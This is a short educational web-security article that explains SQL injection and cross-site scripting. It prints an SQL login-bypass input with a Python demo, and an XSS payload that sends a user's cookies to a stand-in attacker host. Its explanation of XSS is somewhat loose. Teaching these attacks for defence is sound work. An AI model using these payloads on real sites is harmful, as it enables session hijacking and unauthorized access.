Different Web Hacking Techniques

Online security is a serious matter. Every year, millions of dollars are stolen, thousands of websites are defaced and hundreds of pieces of classified information are leaked and stolen by malicious individuals. Staying vigilant against online hackers should therefore be one of our top priorities. One of the best ways to prevent our websites from getting hacked is to be familiar with the popular hacking techniques that malicious hackers around the world use to compromise a system. Here are some of the most popular web hacking techniques to familiarize yourself with. By knowing these, you can create countermeasures that prevent attackers from accessing your website further.

SQL Injection

SQL injection exploits a vulnerability in your website's database layer. If a hacker is able to compromise your database and you’re running an online shop or a website that contains confidential information, then you’re doomed. Hackers typically do it through website forms, by entering input that mimics SQL code. One of the most common ways of doing this is by entering…

  • ' OR 1=1 --

…in your website’s username field. The typical authorization command used by most databases is like…

  • SELECT * FROM users WHERE username = 'USRTEXT' AND password = 'PASSTEXT'

…where USRTEXT and PASSTEXT are what the user enters in the login fields of the web form. If we analyze it carefully, the command will turn out like this:

  • SELECT * FROM users WHERE username = '' OR 1=1 -- ' AND password = ''

What do you need to know about it? The ' closes the username text field and -- is used for commenting out SQL code. Therefore, the actual query that would run will be:

  • SELECT * FROM users WHERE username = '' OR 1=1

This roughly translates as “select every person in your database where the username is equal to the empty value or 1 = 1”, which, as you can see, will evaluate to true because 1 is always equal to 1. You’ve now gained access to the website.

There are still tons of SQL injection techniques available to the hackers, so make sure your database is securely built.
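
As an added example (not part of the original article), the Python sketch below runs the article's input against a concatenated query and against a parameterized one. The in-memory SQLite table, its sample rows and the function names are assumptions made for illustration.

```python
import sqlite3

def make_db():
    """Constructed sample data standing in for the site's user table.
    Plaintext passwords only mirror the article's query; real systems store hashes."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "s3cret"), ("alice", "hunter2")])
    return db

def login_concatenated(db, usrtext, passtext):
    """Vulnerable: user input is pasted into the SQL text, as in the article."""
    query = ("SELECT * FROM users WHERE username = '" + usrtext +
             "' AND password = '" + passtext + "'")
    return query, db.execute(query).fetchall()

def login_parameterized(db, usrtext, passtext):
    """Hardened: input is bound as data, so quotes and -- are never parsed as SQL."""
    query = "SELECT * FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (usrtext, passtext)).fetchall()

if __name__ == "__main__":
    db = make_db()
    payload = "' OR 1=1 --"  # the input quoted in the article
    query, rows = login_concatenated(db, payload, "")
    print("query sent:    ", query)
    print("concatenated:  ", len(rows), "row(s) matched")
    print("parameterized: ", len(login_parameterized(db, payload, "")), "row(s) matched")
    print("valid login:   ", login_parameterized(db, "alice", "hunter2"))
```

With the bound-parameter version the same input is compared literally against the username column and matches nothing, while a correct username and password still log in.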

XSS Attacks

XSS, also known as cross-site scripting, is another popular hacking technique. It occurs when a web application sends data to the web browser in a way that bypasses the authentication or validation process.

An example of a cross-site scripting attack looks like this:

  • (String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";

An attacker would then modify the CC parameter to:

  • '><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'

This sends the current user's cookies to the attacker’s website, giving the attacker the ability to hijack the session. The hacker can then gain access to the website admin panel and take it over.
